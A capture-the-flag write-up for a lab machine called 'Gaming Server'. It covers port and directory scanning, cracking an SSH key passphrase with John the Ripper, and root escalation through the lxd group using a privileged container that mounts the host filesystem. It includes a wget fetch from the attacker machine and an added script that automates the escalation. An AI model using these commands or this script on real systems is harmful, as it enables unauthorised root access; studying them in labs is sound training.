
Gaming Server

Date: 11 November, 2021

Author: Dhaval Kotak

Room: Gaming Server

Port Scanning

nanomite @ zeus in ~/thm/gaming_server
⚡️ nmap 10.10.19.112 | tee nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 22:21 IST
Nmap scan report for 10.10.19.112
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds

Gobuster Scanning

nanomite @ zeus in ~/thm/gaming_server
⚡️ gobuster dir -u http://10.10.19.112 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.19.112
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/11 22:22:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 2762]
/robots.txt           (Status: 200) [Size: 33]  
/secret               (Status: 301) [Size: 313] [--> http://10.10.19.112/secret/]
/server-status        (Status: 403) [Size: 277]                                  
/uploads              (Status: 301) [Size: 314] [--> http://10.10.19.112/uploads/]
           
===============================================================
2021/11/11 22:24:36 Finished
===============================================================

Getting SSH Credentials

Username

  • The HTML source of the index page mentions the username john.

RSA Key

  • The /secret directory found by gobuster contains an encrypted RSA private key (id_rsa).

  • We convert the key into a John-compatible hash with ssh2john.py and then run John the Ripper against it with rockyou.txt to recover the passphrase. As John warns below, this format can emit false positives, so confirm that a candidate actually decrypts the key (for example by having ssh-keygen print the public key with that passphrase) before trying it over SSH.

nanomite @ zeus in ~/thm/gaming_server
⚡️ python /opt/john/ssh2John.py id_rsa > hash
nanomite @ zeus in ~/thm/gaming_server
⚡️ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (id_rsa)
1g 0:00:00:06 71.47% (ETA: 22:29:46) 0.1658g/s 1697Kp/s 1697Kc/s 1697KC/s alfaris
Session aborted

SSH Login

  • Now we can log in as john with the private key and the cracked passphrase.

  • user.txt is sitting in john's home directory.

nanomite @ zeus in ~/thm/gaming_server
⚡️ ssh john@10.10.19.112 -i id_rsa                      
The authenticity of host '10.10.19.112 (10.10.19.112)' can't be established.
ECDSA key fingerprint is SHA256:LO5bYqjXqLnB39jxUzFMiOaZ1YnyFGGXUmf1edL6R9o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.112' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov 11 17:05:39 UTC 2021

  System load:  0.0               Processes:           97
  Usage of /:   41.1% of 9.78GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 10.10.19.112
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt 
a5c2ff8b9c(REDACTED)ff2f1a5a6e7e
  • What is the user flag?

    a5c2ff8b9c(REDACTED)ff2f1a5a6e7e

Privilege Escalation

The id output shows that john is a member of the lxd group. LXD is the system container manager on the host; any member of that group can talk to its socket and create a privileged container with the host's filesystem mounted inside it, which is effectively root on the host.

john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip
),46(plugdev),108(lxd)

On our attacker machine we build a minimal Alpine Linux image with lxd-alpine-builder, transfer it to the target and import it into LXD there.

  • First clone the repository on your machine and run the build-alpine script as root; it writes the image as a tar.gz file into the same directory.

nanomite @ zeus in ~/thm/gaming_server
⚡️ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 42, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 42 (delta 5), reused 4 (delta 1), pack-reused 27
Receiving objects: 100% (42/42), 3.11 MiB | 650.00 KiB/s, done.
Resolving deltas: 100% (11/11), done.
nanomite @ zeus in ~/thm/gaming_server
⚡️ cd lxd-alpine-builder 
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master
⚡️ sudo ./build-alpine 

Now serve the tarball from the attacker machine over HTTP and fetch it on the target (note the file name, not a directory, is requested):

// Your Machine
nanomite @ zeus in ~/thm/gaming_server/lxd-alpine-builder on master*
⚡️ python3 -m http.server 5000                          
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...
// Target Machine
john@exploitable:~$ wget 10.17.14.25:5000/alpine-v3.13-x86_64-20210218_0139.tar.gz

Now import the image into LXD on the target:

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage

Then create a privileged container from it, mount the host's root filesystem at /mnt/root inside the container, and get a shell in it (on a host where LXD has never been initialised, lxd init with the defaults may be needed first so that a storage pool exists):

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
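The escalation above, wrapped into a small script with the two checks a practitioner wants before running it: that the current user is really in the lxd group (parsed from the `id` output, so it also works on hosts where `id` appends a SELinux context), and that the tarball fetched over plain HTTP matches the SHA-256 recorded on the attacker machine, so a truncated download is caught before `lxc image import` fails with a less useful error. This is an added example, not code from the write-up or from lxd-alpine-builder; the image file name, alias and container name are taken from the steps above and can be overridden through the environment, and the expected hash is assumed to have been printed with sha256sum on the build machine.

```shell
#!/bin/sh
# Added example (not from the original write-up): the LXD group escalation
# with pre-flight checks. Assumptions: IMAGE/ALIAS/CONTAINER defaults below,
# and that the caller passes the SHA-256 of the tarball as built on the
# attacker machine.

IMAGE="${IMAGE:-alpine-v3.13-x86_64-20210218_0139.tar.gz}"
ALIAS="${ALIAS:-myimage}"
CONTAINER="${CONTAINER:-ignite}"

# in_group NAME [ID_OUTPUT]: succeed if the `id` output lists group NAME.
# Tokens are split on commas, so "108(lxd)" matches while "108(lxdx)" does
# not; a trailing " context=..." (SELinux) is stripped first.
in_group() {
    _id_out="${2:-$(id)}"
    printf '%s\n' "$_id_out" | sed 's/ context=.*$//' | tr ',' '\n' | grep -q "($1)\$"
}

# sha256_of FILE: hex digest, using whichever tool the host has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_image FILE EXPECTED_SHA256: succeed only if FILE exists and its
# digest equals the one computed on the build machine.
verify_image() {
    [ -f "$1" ] || return 1
    [ "$(sha256_of "$1")" = "$2" ]
}

# lxd_root_shell EXPECTED_SHA256: the steps from the write-up, gated on the
# checks above. Ends in an interactive root shell inside the container, with
# the host filesystem mounted at /mnt/root.
lxd_root_shell() {
    in_group lxd || { echo "current user is not in the lxd group" >&2; return 1; }
    command -v lxc >/dev/null 2>&1 || { echo "lxc client not found" >&2; return 1; }
    verify_image "./$IMAGE" "$1" || { echo "image missing or hash mismatch, not importing" >&2; return 1; }
    lxc image import "./$IMAGE" --alias "$ALIAS"
    lxc init "$ALIAS" "$CONTAINER" -c security.privileged=true
    lxc config device add "$CONTAINER" mydevice disk source=/ path=/mnt/root recursive=true
    lxc start "$CONTAINER"
    lxc exec "$CONTAINER" -- /bin/sh
}

# Usage on the target: sh lxd_root.sh <sha256 printed on the attacker machine>
if [ $# -eq 1 ]; then
    lxd_root_shell "$1"
fi
```

Run `sha256sum alpine-*.tar.gz` next to the build output before serving it, copy the script and the tarball to the target, and invoke the script with that digest; with any other argument count it only defines the functions, which is convenient for sourcing it and calling `in_group` or `verify_image` on their own.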

Inside the container the host's filesystem is under /mnt/root, so root's home directory on the host is /mnt/root/root and the root flag can be read from there.

  • What is the root flag?

    2e337b8c9f(REDACTED)8d4e6a7c88fc
